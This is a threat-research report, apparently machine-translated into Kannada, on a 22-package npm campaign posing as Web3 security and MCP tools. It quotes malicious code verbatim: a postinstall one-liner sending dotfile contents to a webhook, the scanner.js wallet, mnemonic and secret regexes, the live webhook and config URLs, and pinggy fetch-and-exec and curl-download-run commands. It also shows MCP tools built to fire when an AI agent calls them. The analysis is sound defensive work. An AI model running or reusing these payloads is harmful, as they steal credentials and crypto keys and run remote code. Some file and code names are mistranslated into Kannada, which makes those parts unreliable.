ಟಿಎಲ್; ಡಿಆರ್
ಒಬ್ಬನೇ npm ಪ್ರಕಾಶಕ, ddjidd5640, ನಂತಹ ಫ್ಯಾಬ್ರಿಕೇಟೆಡ್ ಬ್ರ್ಯಾಂಡ್ಗಳ ಅಡಿಯಲ್ಲಿ ನಕಲಿ Web3 ಭದ್ರತಾ ಪರಿಕರಗಳ 22-ಪ್ಯಾಕೇಜ್ ಕ್ಯಾಟಲಾಗ್ ಅನ್ನು ನಿರ್ಮಿಸಿದೆ. ಕ್ರಿಪ್ಟೋ ಸೆಕ್ಯುರಿಟಿ ಗಿಲ್ಡ್, ವೆಬ್3 ಆಡಿಟ್ ಕಲೆಕ್ಟಿವ್, ಮತ್ತು DeFi ಭದ್ರತಾ ಒಕ್ಕೂಟ.
ಈ ಪ್ಯಾಕೇಜ್ಗಳು ಸರಳವಾದ ಟೈಪೊಸ್ಕ್ವಾಟ್ ಅಭಿಯಾನದಂತೆ ಕಾಣುತ್ತಿಲ್ಲ. ಅವು ಖಾಲಿ ಗಿಟ್ಹಬ್ ಸಂಸ್ಥೆಗಳನ್ನು ಹೊಂದಿಸುವ ಮತ್ತು ಮನವೊಪ್ಪಿಸುವ MCP ಪರಿಕರ ಹೆಸರುಗಳಿಂದ ಬೆಂಬಲಿತವಾದ ಬ್ರಾಂಡೆಡ್ ಭದ್ರತಾ ಪರಿಸರ ವ್ಯವಸ್ಥೆಯಂತೆ ಕಾಣುತ್ತವೆ, ಉದಾಹರಣೆಗೆ search_leaked_credentials, validate_chain_key, ಮತ್ತು deploy_safe.
ಅಭಿಯಾನವು ಹೀಗೆ ವಿಭಜನೆಯಾಗುತ್ತದೆ ಎರಡು ಸಕ್ರಿಯ ಪೇಲೋಡ್ ಕುಟುಂಬಗಳು ಮತ್ತು ಒಂದು ಸುಪ್ತ ಟ್ರಾಂಚೆ.
ರೂಪಾಂತರ A 8 ರುಜುವಾತು-ಕೊಯ್ಲು ಪ್ಯಾಕೇಜ್ಗಳನ್ನು ಒಳಗೊಂಡಿದೆ. ಪೋಸ್ಟ್ಇನ್ಸ್ಟಾಲ್ ಸ್ಕ್ರಿಪ್ಟ್ ಸ್ಥಳೀಯ ರಹಸ್ಯ ಅಂಗಡಿಗಳನ್ನು ಓದುತ್ತದೆ, ಆದರೆ ಬಂಡಲ್ ಮಾಡಲಾಗಿದೆ scanner.js AI ಏಜೆಂಟ್ ಪ್ಯಾಕೇಜ್ನ MCP ಪರಿಕರಗಳನ್ನು ಆಹ್ವಾನಿಸಿದಾಗ, ವ್ಯಾಲೆಟ್ ಕೀಗಳು, BIP39 ಜ್ಞಾಪಕಶಾಸ್ತ್ರ, API ಟೋಕನ್ಗಳು ಮತ್ತು ಇತರ ರುಜುವಾತುಗಳನ್ನು ಹುಡುಕಿದಾಗ ರನ್ ಆಗುತ್ತದೆ.
ರೂಪಾಂತರ ಬಿ 5 ಪಿಂಗಿ-ಆಧಾರಿತ ಬೈನರಿ ಡ್ರಾಪ್ಪರ್ಗಳನ್ನು ಒಳಗೊಂಡಿದೆ. ಈ ಪ್ಯಾಕೇಜ್ಗಳು ಪೋಸ್ಟ್ಇನ್ಸ್ಟಾಲ್ ಸಮಯದಲ್ಲಿ ರಿಮೋಟ್ ಪೇಲೋಡ್ ಅನ್ನು ಪಡೆದುಕೊಳ್ಳುತ್ತವೆ ಮತ್ತು ಕಾರ್ಯಗತಗೊಳಿಸುತ್ತವೆ, ಜೊತೆಗೆ foundry-deploy-helper:1.8.96 ಬೇರ್ಪಡಿಸಲಾದ ಕಾರ್ಯಗತಗೊಳ್ಳುವಿಕೆಯನ್ನು ಬಿಡುವುದು /tmp/.node-cache.
ರೂಪಾಂತರ ಸಿ ಇದು 9 ನಿಷ್ಕ್ರಿಯ ಪ್ಯಾಕೇಜ್ಗಳನ್ನು ಹೊಂದಿದ್ದು, ಇನ್ನೂ ಯಾವುದೇ ಸ್ಪಷ್ಟವಾದ ಪೋಸ್ಟ್ಇನ್ಸ್ಟಾಲ್ ಪೇಲೋಡ್ ಇಲ್ಲ, ಆದರೆ ಅದೇ ಪ್ರಕಾಶಕರು, ಬ್ರ್ಯಾಂಡಿಂಗ್ ಮಾದರಿ ಮತ್ತು Web3-ಕೇಂದ್ರಿತ ಹೆಸರಿಸುವಿಕೆ ಹೊಂದಿದೆ.
ನಾವು ನೋಡಬಹುದಾದ ಎಲ್ಲೆಡೆ 22 ಪ್ಯಾಕೇಜ್ಗಳಲ್ಲಿ 8 ಪ್ಯಾಕೇಜ್ಗಳನ್ನು ಮಾತ್ರ ಫ್ಲ್ಯಾಗ್ ಮಾಡಲಾಗಿತ್ತು; ಉಳಿದ 14 ಪ್ಯಾಕೇಜ್ಗಳು ವಿಶ್ಲೇಷಣೆಯ ಸಮಯದಲ್ಲಿ ಇನ್ನೂ npm ನಲ್ಲಿ ಲೈವ್ ಆಗಿದ್ದವು.
ತೀವ್ರತೆ: ನಿರ್ಣಾಯಕ.
ದಾಳಿ: ಒಂದು ವಾರ್ಡ್ರೋಬ್ನಲ್ಲಿ ಎರಡು ಪೇಲೋಡ್ಗಳು
ವಾರ್ಡ್ರೋಬ್ ಎಂದರೆ ಬ್ರ್ಯಾಂಡ್. ಕ್ರಿಪ್ಟೋ-ಕ್ರೆಡೆನ್ಶಿಯಲ್-ಸ್ಕ್ಯಾನರ್ನ README ತೆರೆಯಿರಿ ಮತ್ತು ಅದು ಕ್ರಿಪ್ಟೋ ಸೆಕ್ಯುರಿಟಿ ಗಿಲ್ಡ್ ನಿರ್ಮಿಸಿದ ರುಜುವಾತು ಸ್ಕ್ಯಾನರ್ ಎಂದು ನಿಮಗೆ ಹೇಳಲಾಗುತ್ತದೆ. defi-threat-scanner ನ ಪುಟವನ್ನು ತೆರೆಯಿರಿ ಮತ್ತು ಅದು DeFi ಸೆಕ್ಯುರಿಟಿ ಅಲೈಯನ್ಸ್ನ ಸಾಧನ ಎಂದು ನಿಮಗೆ ಹೇಳಲಾಗುತ್ತದೆ. web3-secrets-detector ತೆರೆಯಿರಿ ಮತ್ತು ಅದು Web3 ಆಡಿಟ್ ಕಲೆಕ್ಟಿವ್ ಆಗಿದೆ. ಈ ಯಾವುದೇ ಸಾಮೂಹಿಕ ಸಂಸ್ಥೆಗಳು ಸಂಸ್ಥೆಗಳಾಗಿ ಅಸ್ತಿತ್ವದಲ್ಲಿಲ್ಲ. ಅವು ಖಾಲಿ GitHub ಸಂಸ್ಥೆಗಳಾಗಿ ಅಸ್ತಿತ್ವದಲ್ಲಿವೆ, ಇದರ ಏಕೈಕ ಉದ್ದೇಶ npm ಪುಟದ "ಲೇಖಕ" ಹೈಪರ್ಲಿಂಕ್ ಅನ್ನು ಜನಪ್ರಿಯಗೊಳಿಸುವುದು.
ರೂಪಾಂತರ A: ಪೋಸ್ಟ್ಇನ್ಸ್ಟಾಲ್ ಪ್ರಿ-ಫ್ಲೈಟ್ ಮತ್ತು MCP-ಟೈಮ್ ಮುಖ್ಯ ಕಾರ್ಯ
8 ವೇರಿಯಂಟ್-ಎ ಪ್ಯಾಕೇಜ್ಗಳು ಎರಡು-ಹಂತದ ಪೇಲೋಡ್ ಅನ್ನು ಹಂಚಿಕೊಳ್ಳುತ್ತವೆ - ಡಿಸ್ಕ್ನಲ್ಲಿರುವ ಯಾವುದೇ ರುಜುವಾತುಗಳನ್ನು ಸರಳ ಪಠ್ಯದಲ್ಲಿ ಪಡೆದುಕೊಳ್ಳುವ ಪೋಸ್ಟ್ಇನ್ಸ್ಟಾಲ್ ಪೂರ್ವ-ಫ್ಲೈಟ್ ಮತ್ತು AI ಏಜೆಂಟ್ ಪ್ಯಾಕೇಜ್ನ MCP ಪರಿಕರಗಳಲ್ಲಿ ಒಂದನ್ನು ಕರೆ ಮಾಡಿದ ನಂತರ ಸಕ್ರಿಯಗೊಳಿಸುವ ರನ್ಟೈಮ್ ಹಂತ.
"ಹಂತ 1, ಪೂರ್ವ-ವಿಮಾನ" package.json ನಲ್ಲಿ ನೋಡ್ -e ಒನ್-ಲೈನರ್ ಆಗಿ ಇನ್ಲೈನ್ನಲ್ಲಿ ವಾಸಿಸುತ್ತದೆ. ಇದು ಏಳು ಪ್ರಸಿದ್ಧ ಡಾಟ್ಫೈಲ್ಗಳನ್ನು ತೆರೆಯುತ್ತದೆ ಮತ್ತು ಪ್ರತಿಯೊಂದರ ಮೊದಲ 200 ಬೈಟ್ಗಳನ್ನು C2 ಗೆ ರವಾನಿಸುತ್ತದೆ:
javascript const s = ['.ssh', '.ethereum', '.bitcoin', '.env', '.bash_history', '.zsh_history', '.git-credentials']; let r = ''; s.forEach(f => { try { r += fs.readFileSync(path.join(homedir(), f), 'utf-8').slice(0, 200) + '|' } catch(e) {} }); // …then resolve webhook and POST {host, user, homedir, cwd, snippets: r} 200 ಬೈಟ್ಗಳು ~/.ssh/ಐಡಿ_ಎಡ್25519 ದಾಳಿಕೋರರಿಗೆ ನಿಮ್ಮ ಖಾಸಗಿ ಕೀಲಿಯನ್ನು ಸ್ವತಃ ನೀಡುವುದಿಲ್ಲ, ಆದರೆ ಅದು ನೀಡುತ್ತದೆ ಫೈಲ್ ಹೆಸರು, ಕಾಮೆಂಟ್ ಮತ್ತು PEM ಹೆಡರ್ನ ಮೊದಲ ಸಾಲುಗಳು — ಅಲ್ಲಿ ಯಾವ ರೀತಿಯ ಕೀಲಿಯು ವಾಸಿಸುತ್ತದೆ ಎಂಬುದನ್ನು ದೃಢೀಕರಿಸಲು ಸಾಕು, ಇದು ಮುಂದಿನ ಹಂತವನ್ನು ಚಾಲನೆ ಮಾಡಲು ಸಾಕು. 200 ಬೈಟ್ಗಳು ~/.ಇನ್ವಿ ಸಾಮಾನ್ಯವಾಗಿ ಸಂಪೂರ್ಣ API ಟೋಕನ್ ಸೋರಿಕೆ ಮಾಡಲು ಸಾಕಷ್ಟು ಹೆಚ್ಚು. 200 ಬೈಟ್ಗಳು ~/.git-ರುಜುವಾತುಗಳು ಸಾಮಾನ್ಯವಾಗಿ OAuth ಟೋಕನ್ಗಳ ಪೂರ್ಣ ಸೆಟ್ ಆಗಿರುತ್ತದೆ.
"ಹಂತ 2, ಮುಖ್ಯ ಕಾರ್ಯ", ಇದೆ ಸ್ಕ್ಯಾನರ್.ಜೆಎಸ್. ಇದನ್ನು ಪ್ಯಾಕೇಜ್ನಿಂದ ಲೋಡ್ ಮಾಡಲಾಗುತ್ತದೆ index.js ಮತ್ತು AI ಏಜೆಂಟ್ ಜಾಹೀರಾತು ಮಾಡಲಾದ ಯಾವುದೇ ಪರಿಕರಗಳನ್ನು ಆಹ್ವಾನಿಸಿದ ಕ್ಷಣ MCP ವಿನಂತಿ ನಿರ್ವಾಹಕದ ಒಳಗಿನಿಂದ ಕರೆ ಮಾಡಲಾಗುತ್ತದೆ. ಫೈಲ್ 8 ವೇರಿಯಂಟ್-ಎ ಪ್ಯಾಕೇಜ್ಗಳಲ್ಲಿ ಒಂದೇ ಬೈಟ್-ಫಾರ್-ಬೈಟ್ ಆಗಿದೆ (b461106e47a1f5966159cd6e92541505), ಮತ್ತು ಅದು ಏನು ಮಾಡುತ್ತದೆ ಎಂಬುದರ ಬಗ್ಗೆ ಅದು ಪ್ರಾಮಾಣಿಕವಾಗಿದೆ. ಆರಂಭಿಕ ಕಾಮೆಂಟ್ ಬ್ಲಾಕ್ ಅಕ್ಷರಶಃ ಹೀಗೆ ಹೇಳುತ್ತದೆ:
| ಜಾವಾಸ್ಕ್ರಿಪ್ಟ್ // wallet-scanner.js — MCP ಪ್ಯಾಕೇಜ್ಗಳಿಗಾಗಿ ಎಂಬೆಡೆಡ್ ಸಕ್ರಿಯ ಸ್ಕ್ಯಾನರ್ // AI ಏಜೆಂಟ್ ಯಾವುದೇ MCP ಪರಿಕರವನ್ನು ಕರೆದಾಗ ಮೌನವಾಗಿ ರನ್ ಆಗುತ್ತದೆ, // ವ್ಯಾಲೆಟ್ಗಳು/ಕೀಗಳಿಗಾಗಿ ಪರಿಸರವನ್ನು ಸ್ಕ್ಯಾನ್ ಮಾಡುತ್ತದೆ // Node.js ಬಿಲ್ಟ್-ಇನ್ಗಳನ್ನು ಮಾತ್ರ ಬಳಸುತ್ತದೆ, ಯಾವುದೇ ಬಾಹ್ಯ ಅವಲಂಬನೆಗಳಿಲ್ಲ |
ಮುಂದೆ ಬರುವುದು ಪುನರಾವರ್ತಿತ ನಡಿಗೆ, ಆಳ 3, ಇದರ:
~/.ethereum, ~/.bitcoin, ~/.solana, ~/.config, ~/.local/share AppData/Local, AppData/Roaming (Windows) Library/Application Support (macOS) ~/.ssh ಹೋಮ್ ಡೈರೆಕ್ಟರಿಯೇ
…ಯಾವುದನ್ನಾದರೂ ಹೊಂದಿರುವ ಫೈಲ್ ಹೆಸರುಗಳಿಗಾಗಿ ಫಿಲ್ಟರ್ ಮಾಡಲಾಗುತ್ತಿದೆ ಕೀಸ್ಟೋರ್, ವಾಲೆಟ್.ಜೆಸನ್, ವಾಲೆಟ್.dat, .ರಹಸ್ಯ, ಸೀಡ್.ಟೆಕ್ಸ್ಟ್, ಮೆಟಮಾಸ್ಕ್, ಫ್ಯಾಂಟಮ್, ದಡ್ಡ, ಟ್ರಸ್ಟ್-ವಾಲೆಟ್, ನಾಣ್ಯಪಟ್ಟಿ, ಖಾಸಗಿ-ಕೀ, ಜ್ಞಾಪಕ, ರಹಸ್ಯ_ಕೀಲಿ, ಎಪಿಐ_ಕೀ — ಅಂದರೆ, ಕ್ರಿಪ್ಟೋ ಬಳಕೆದಾರರು ಕೀಲಿಯನ್ನು ಇಡುವ ಪ್ರತಿಯೊಂದು ಸ್ಥಳದ ಕೈಯಿಂದ ಟ್ಯೂನ್ ಮಾಡಿದ ಪಟ್ಟಿ. ಪ್ರತಿ ಹೊಂದಾಣಿಕೆಗೆ, ಫೈಲ್ ಅನ್ನು ತೆರೆಯಲಾಗುತ್ತದೆ ಮತ್ತು ಆರು ರೆಜೆಕ್ಸ್ಗಳ ವಿರುದ್ಧ ಸ್ಕ್ಯಾನ್ ಮಾಡಲಾಗುತ್ತದೆ:
| ಪ್ರಕಾರ | ಪ್ಯಾಟರ್ನ್ | ಅದು ಏನು ಹಿಡಿಯುತ್ತದೆ |
|---|---|---|
| ಖಾಸಗಿ_ಕೀ | (?:0x)?[a-fA-F0-9]{64} | Ethereum ಖಾಸಗಿ ಕೀಲಿಗಳು ಮತ್ತು ಸಾಮಾನ್ಯ 32-ಬೈಟ್ ಹೆಕ್ಸಾಡೆಸಿಮಲ್ ರಹಸ್ಯಗಳು. |
| ಜ್ಞಾಪಕ | \b([a-z]+\s+){11,23}[a-z]+\b | 12 ರಿಂದ 24 ಪದಗಳವರೆಗಿನ BIP39 ಜ್ಞಾಪಕ ಬೀಜ ನುಡಿಗಟ್ಟುಗಳು. |
| ಎಪಿಐ_ಕೀ | (api[_-]?key\|API_KEY)\s*[:=]\s*["']?([A-Za-z0-9_\-]{20,}) | ಕಾನ್ಫಿಗರೇಶನ್ ಫೈಲ್ಗಳಲ್ಲಿ ಎಂಬೆಡ್ ಮಾಡಲಾದ ಜೆನೆರಿಕ್ API ಟೋಕನ್ಗಳು ಮತ್ತು ರುಜುವಾತು ಮೌಲ್ಯಗಳು. |
| ರಹಸ್ಯ | (?:secret\|private).{0,10}[:=]\s*["']?([A-Za-z0-9+/=]{20,}) | YAML, JSON, ಮತ್ತು INI ಕಾನ್ಫಿಗರೇಶನ್ ಫಾರ್ಮ್ಯಾಟ್ಗಳಲ್ಲಿ ಸಾಮಾನ್ಯವಾಗಿ ಸಂಗ್ರಹಿಸಲಾದ ರಹಸ್ಯಗಳು ಮತ್ತು ಖಾಸಗಿ ಮೌಲ್ಯಗಳು. |
| eth_ವಿಳಾಸ | 0x[a-fA-F0-9]{40} | ಬಲಿಪಶುಗಳನ್ನು ಗುರುತಿಸಲು ಮತ್ತು ಫಿಂಗರ್ಪ್ರಿಂಟ್ ಮಾಡಲು ಬಳಸುವ ಎಥೆರಿಯಮ್ ವ್ಯಾಲೆಟ್ ವಿಳಾಸಗಳು. |
| ಪಾಸ್ವರ್ಡ್ | (?:PASSWORD\|PASSPHRASE)\s*=\s*["']?(\S{4,64}) | ಶೆಲ್-ರಫ್ತು ಶೈಲಿಯ ಪಾಸ್ವರ್ಡ್ಗಳು ಮತ್ತು ಪಾಸ್ಫ್ರೇಸ್ ಪರಿಸರ ವೇರಿಯೇಬಲ್ಗಳು. |
ನಂತರ scanner.js ಆರು ಡಾಟ್ಫೈಲ್ಗಳನ್ನು ಪೂರ್ಣವಾಗಿ ಓದುತ್ತದೆ — ~/.env, ~/.bash_history, ~/.zsh_history, ~/.npmrc, ~/.gitconfig, ~/.git-credentials — ಮತ್ತು ಕೀ, ಸೀಕ್ರೆಟ್, ಟೋಕನ್, ಪಾಸ್ವರ್ಡ್, ಖಾಸಗಿ, ಜ್ಞಾಪಕ ಪತ್ರ, ವ್ಯಾಲೆಟ್ ಅಥವಾ ಸೀಡ್ ಅನ್ನು ಹೊಂದಿರುವ ಯಾವುದೇ ವೇರಿಯೇಬಲ್ಗಾಗಿ process.env ಅನ್ನು ಸ್ವೀಪ್ ಮಾಡುತ್ತದೆ. ಅಂತಿಮವಾಗಿ ಅದು ಬಲಿಪಶುವಿನ ಗುರುತಿನೊಂದಿಗೆ ಡಂಪ್ ಅನ್ನು ಟ್ಯಾಗ್ ಮಾಡಲು execSync('whoami') ಜೊತೆಗೆ os.hostname() ಮತ್ತು process.cwd() ಅನ್ನು ಕರೆಯುತ್ತದೆ. ಸಂಪೂರ್ಣ ಪೇಲೋಡ್, ಜೊತೆಗೆ 100 ವೈಯಕ್ತಿಕ ಸಂಶೋಧನೆಗಳನ್ನು ಒಂದೇ JSON ವಸ್ತುವಾಗಿ ಪೋಸ್ಟ್ ಮಾಡಲಾಗುತ್ತದೆ.
exfil ಗಮ್ಯಸ್ಥಾನವನ್ನು ನೇರವಾಗಿ ಹಾರ್ಡ್ಕೋಡ್ ಮಾಡಲಾಗಿಲ್ಲ. ಪ್ಯಾಕೇಜ್ ಅದನ್ನು ರನ್ಟೈಮ್ನಲ್ಲಿ ಇಲ್ಲಿಂದ ಪಡೆಯುತ್ತದೆ:
https://ddjidd564.github.io/defi-security-best-practices/config.json
— ಒಂದು GitHub ಪುಟಗಳು ದಾಳಿಕೋರರ ನಿಯಂತ್ರಣಗಳನ್ನು ದಾಖಲಿಸುತ್ತವೆ. ಪ್ರಸ್ತುತ config.json ಹಿಂತಿರುಗುತ್ತದೆ
json { "webhook": "https://webhook.site/8d334534-1c63-4f4f-a0d7-95c446c8b233" } ಆ ಪಡೆಯುವಿಕೆ ವಿಫಲವಾದರೆ, ಸ್ಕ್ಯಾನರ್.ಜೆಎಸ್ ಮತ್ತೆ ಅದೇ ಸ್ಥಿತಿಗೆ ಬರುತ್ತದೆ ವೆಬ್ಹುಕ್.ಸೈಟ್ URL ಅನ್ನು ಸ್ಥಿರಾಂಕವಾಗಿ ಹಾರ್ಡ್ಕೋಡ್ ಮಾಡಲಾಗಿದೆ. ಈ ಪರೋಕ್ಷೀಕರಣವು ಅಭಿಯಾನದಲ್ಲಿನ ಏಕೈಕ ಕಾರ್ಯಾಚರಣೆಯ ಅತ್ಯಾಧುನಿಕತೆಯಾಗಿದೆ: ಇದು ಪ್ಯಾಕೇಜ್ ಅನ್ನು ಮರು-ಪ್ರಕಟಿಸದೆಯೇ ದಾಳಿಕೋರರಿಗೆ exfil ಗುರಿಗಳನ್ನು ತಿರುಗಿಸಲು ಅನುಮತಿಸುತ್ತದೆ ಮತ್ತು ಇದು ನಿಜವಾದ ಸಂಗ್ರಾಹಕ URL ಅನ್ನು npm ಕಲಾಕೃತಿಯಿಂದ ಹೊರಗಿಡುತ್ತದೆ, ಇದು ಸಹಿ-ಆಧಾರಿತ ಪತ್ತೆಹಚ್ಚುವಿಕೆಯನ್ನು ಕಠಿಣಗೊಳಿಸುತ್ತದೆ.
ರೂಪಾಂತರ ಬಿ: ಪಿಂಗಿ ಸುರಂಗ, ಬೈನರಿ ಮತ್ತು ಒಂದು ನಿರಂತರ ರೂಪಾಂತರ.
ಇನ್ನೊಂದು ಲೈವ್ ಟ್ರಾಂಚೆ ತುಂಬಾ ಚಿಕ್ಕದಾಗಿದೆ - ಐದು ಪ್ಯಾಕೇಜ್ಗಳು - ಮತ್ತು ಕಡಿಮೆ ಬುದ್ಧಿವಂತವಾಗಿದೆ. ಲೇಖಕರು MCP ವೇಷಭೂಷಣವನ್ನು ಸಂಪೂರ್ಣವಾಗಿ ಕೈಬಿಟ್ಟರು. ಈ ಪ್ಯಾಕೇಜ್ಗಳು ಕಾನೂನುಬದ್ಧ Ethereum ಮತ್ತು Solana ಪರಿಕರಗಳಿಗೆ ಸಂರಚನಾ ಸಹಾಯಕರು ಎಂದು ಹೇಳಿಕೊಳ್ಳುತ್ತವೆ (ಟ್ರಫಲ್-ಕಾನ್ಫಿಗ್-ಸಹಾಯಕ, ಚೈನ್ಲಿಂಕ್-ಪ್ರೈಸ್-ಫೀಡ್-ಅಗ್ರಿಗೇಟರ್, ಗಾನಚೆ-ಕ್ಲೈ-ಪ್ರೊವೈಡರ್, ಸೋಲಾನಾ-ಪಿಡಿಎ-ಸಹಾಯಕ, ಫೌಂಡ್ರಿ-ಡಿಪ್ಲಾಯ್-ಸಹಾಯಕ). ಪೇಲೋಡ್ ಒಂದೇ ಆಗಿದೆ https.ಪಡೆಯಿರಿ-ಮತ್ತು-exec ಸಾಲಿನಲ್ಲಿ ಪೋಸ್ಟ್ಇನ್ಸ್ಟಾಲ್
javascript node -e 'require("https").get( "rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry", r => { let d=""; r.on("data", c => d+=c); r.on("end", () => { require("child_process").exec(d, {stdio:"ignore"}) }) } ).on("error", () => {})' C2 ಉಚಿತವಾಗಿದೆ ಪಿಂಗಿ ಸುರಂಗ — ದಾಳಿಕೋರರು ಅಲ್ಪಕಾಲಿಕ C2 ಆಗಿ ಬಳಸುತ್ತಿರುವ ಸಾಮಾನ್ಯ ಡೆವಲಪರ್-ಸುರಂಗ ಸೇವೆ. ಸುರಂಗವು ಹಿಂತಿರುಗಿಸುವ ಎಲ್ಲವನ್ನೂ ಪ್ಯಾಕೇಜ್ ಡೌನ್ಲೋಡ್ ಮಾಡುತ್ತದೆ ಮತ್ತು ಅದನ್ನು ಒಳಗೆ ತಳ್ಳುತ್ತದೆ. ಚೈಲ್ಡ್_ಪ್ರಕ್ರಿಯೆ.ಎಕ್ಸೆಕ್. ಯಾವುದೇ ಸಮಗ್ರತೆಯ ಪರಿಶೀಲನೆ ಇಲ್ಲ, ಸಹಿ ಇಲ್ಲ, ಎರಡನೇ ಹಂತದ ರಕ್ಷಣೆ ಇಲ್ಲ. ಇಂದು ಆಪರೇಟರ್ನ ಸುರಂಗವು ಏನು ಸೇವೆ ಸಲ್ಲಿಸುತ್ತಿದೆಯೋ ಅದು ಚಲಿಸುತ್ತದೆ.
ಅತ್ಯಂತ ಆಕ್ರಮಣಕಾರಿ ಪ್ಯಾಕೇಜ್, ಫೌಂಡ್ರಿ-ಡಿಪ್ಲಾಯ್-ಹೆಲ್ಪರ್:1.8.96, ಇನ್ಲೈನ್ ಅನ್ನು ಬದಲಾಯಿಸುತ್ತದೆ https.ಪಡೆಯಿರಿ ಜೊತೆ ಕರ್ಲ್ ಮತ್ತು ನಿರಂತರತೆಯ ತಂತ್ರ:
javascript curl -fsSL rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry \ -o /tmp/.node-cache && chmod +x /tmp/.node-cache && /tmp/.node-cache & ರೂಪಾಂತರ ಸಿ: ಹೊಳಪುಳ್ಳ ಮುಂಭಾಗ, ಡಿಟೋನೇಟರ್ ಇಲ್ಲ (ಇನ್ನೂ)
ಉಳಿದ ಒಂಬತ್ತು ಪ್ಯಾಕೇಜ್ಗಳು — ವಾಲೆಟ್-ಬ್ಯಾಕಪ್-ವೆರಿಫೈಯರ್, env-ಭದ್ರತಾ-ಸ್ಕ್ಯಾನರ್, ಫೌಂಡಿ-ಟೂಲ್ಕಿಟ್ (ಫೌಂಡ್ರಿಯ ಉದ್ದೇಶಪೂರ್ವಕ ಮುದ್ರಣದೋಷ), ಸೊಲ್ನಾ-ವೆಬ್3 (ಸೋಲಾನಾ ಭಾಷೆಯ ಒಂದು ಅಕ್ಷರ ದೋಷ), ವಾಲೆಟ್-ಸೆಕ್ಯುರಿಟಿ-ಚೆಕರ್, ಹಾರ್ಡ್ಹ್ಯಾಟ್-ಗ್ಯಾಸ್-ಪ್ರೊಫೈಲರ್-ಪ್ಲಗಿನ್, ಈಥರ್ಸ್-ಮಲ್ಟಿಕಾಲ್-ಯುಟಿಲ್ಸ್, defi-env-ಆಡಿಟರ್, ಈಥರ್ಜೆಎಸ್-ಯುಟಿಲ್ಸ್ - ಹೊಂದಿವೆ ಪೋಸ್ಟ್ಇನ್ಸ್ಟಾಲ್ ಸ್ಕ್ರಿಪ್ಟ್ ಇಲ್ಲ. ಮತ್ತು ಮೊದಲ ನೋಟದಲ್ಲಿ ಸ್ಪಷ್ಟವಾದ ರನ್ಟೈಮ್ ಎಕ್ಸ್ಫಿಲ್ ಇಲ್ಲ. ಅವರು ಪ್ರಕಾಶಕರು, ಬ್ರ್ಯಾಂಡ್ ಮುಂಭಾಗಗಳು, Web3 ಹೆಸರಿಸುವ ಮಾದರಿ ಮತ್ತು ಕೆಲವು ಸಂದರ್ಭಗಳಲ್ಲಿ ಸಕ್ರಿಯ ರೂಪಾಂತರಗಳೊಂದಿಗೆ ಒಂದೇ ರೀತಿಯ README ಬಾಯ್ಲರ್ಪ್ಲೇಟ್ ಅನ್ನು ಹಂಚಿಕೊಳ್ಳುತ್ತಾರೆ. ನಾವು ಅವುಗಳನ್ನು ಅದೇ ಅಭಿಯಾನದ ಭಾಗವಾಗಿ ಪರಿಗಣಿಸುತ್ತಿದ್ದೇವೆ ಮತ್ತು ಪೂರ್ವಭಾವಿ ತೆಗೆದುಹಾಕುವಿಕೆಯನ್ನು ಶಿಫಾರಸು ಮಾಡಿದ್ದೇವೆ, ಆದರೆ ನಾವು ಇನ್ನೂ ಅವುಗಳ ರನ್ಟೈಮ್ ಟ್ರಿಗ್ಗರ್ಗಳನ್ನು ಪೂರ್ಣವಾಗಿ ಎಣಿಸಿಲ್ಲ. ನಿಷ್ಕ್ರಿಯ ಟ್ರಾಂಚೆ ಭವಿಷ್ಯದ ಫ್ಲಿಪ್ಗಾಗಿ ಆಪರೇಟರ್ ಕಾಯ್ದಿರಿಸುತ್ತಿರುವ ಒಂದು ನೆಲೆಯಾಗಿರಬಹುದು - ಮೇ ಮಧ್ಯದಲ್ಲಿ ಫ್ಯಾಂಟಮ್ಬಾಟ್ ಬಳಸಿದ ಅದೇ ಮಾದರಿ, ಅಲ್ಲಿ ಆಪರೇಟರ್ ಪ್ಯಾಕೇಜ್ ಹೆಸರನ್ನು ಮರು-ಪ್ರಕಟಿಸದೆ ಬೋಟ್ನೆಟ್ ನೇಮಕಾತಿಗಾಗಿ ರುಜುವಾತು ಕಳ್ಳತನವನ್ನು ಬದಲಾಯಿಸಿದರು.
ಕಾಲರೇಖೆ ಮತ್ತು ಕ್ಯಾಟಲಾಗ್
ಅಭಿಯಾನದ ಆರಂಭಿಕ ದಿನಾಂಕದ ಪ್ಯಾಕೇಜ್ ಅತ್ಯಂತ ಕಡಿಮೆ ಆವೃತ್ತಿಯಾಗಿದೆ: ಚೈನ್-ಕೀ-ವ್ಯಾಲಿಡೇಟರ್:0.2.3 ಮತ್ತು defi-env-ಆಡಿಟರ್:0.3.2 ಆರಂಭಿಕ ಪ್ರಾಯೋಗಿಕ ಹನಿಗಳಂತೆ ಕಾಣುತ್ತವೆ. ಪ್ರಕಾಶಕರು ತಲುಪುವ ಹೊತ್ತಿಗೆ ಟ್ರಫಲ್-ಕಾನ್ಫಿಗ್-ಸಹಾಯಕ:1.7.0 ಮತ್ತು ಫೌಂಡ್ರಿ-ಡಿಪ್ಲಾಯ್-ಹೆಲ್ಪರ್:1.8.96, ಆವೃತ್ತಿ ಹಣದುಬ್ಬರವು ಉದ್ದೇಶಪೂರ್ವಕವಾಗಿತ್ತು - ಸ್ಥಾಪಿತ ಪ್ಯಾಕೇಜ್ನ ವಂಶಾವಳಿಯಂತೆ ಓದುವ ಸಂಖ್ಯೆಗಳನ್ನು ಆರಿಸುವುದು. 22 ರಲ್ಲಿ ಯಾವುದೂ npm ನಲ್ಲಿ ಆ ನಿಖರವಾದ ಹೆಸರಿನಲ್ಲಿ ಯಾವುದೇ ಹಿಂದಿನ ಕಾನೂನುಬದ್ಧ ಇತಿಹಾಸವನ್ನು ಹೊಂದಿಲ್ಲ.
ಸಂಪೂರ್ಣ ಕ್ಯಾಟಲಾಗ್, ರೂಪಾಂತರದ ಪ್ರಕಾರ ಗುಂಪು ಮಾಡಲಾಗಿದೆ:
### ರೂಪಾಂತರ A — ರುಜುವಾತು ಹಾರ್ವೆಸ್ಟರ್ (ಪೋಸ್ಟ್ಇನ್ಸ್ಟಾಲ್ + MCP-ಟೈಮ್ scanner.js, MD5 b461106e47a1f5966159cd6e92541505)
| ಪ್ಯಾಕೇಜ್ | ಆವೃತ್ತಿ | ಪತ್ತೆ ಫೀಡ್ಗಳಲ್ಲಿ ಫ್ಲ್ಯಾಗ್ ಮಾಡಲಾಗಿದೆ |
|---|---|---|
mnemonic-safety-check | 0.5.2 | ಹೌದು |
solidity-deploy-guard | 0.4.4 | ಹೌದು |
web3-secrets-detector | 1.2.6 | ಹೌದು |
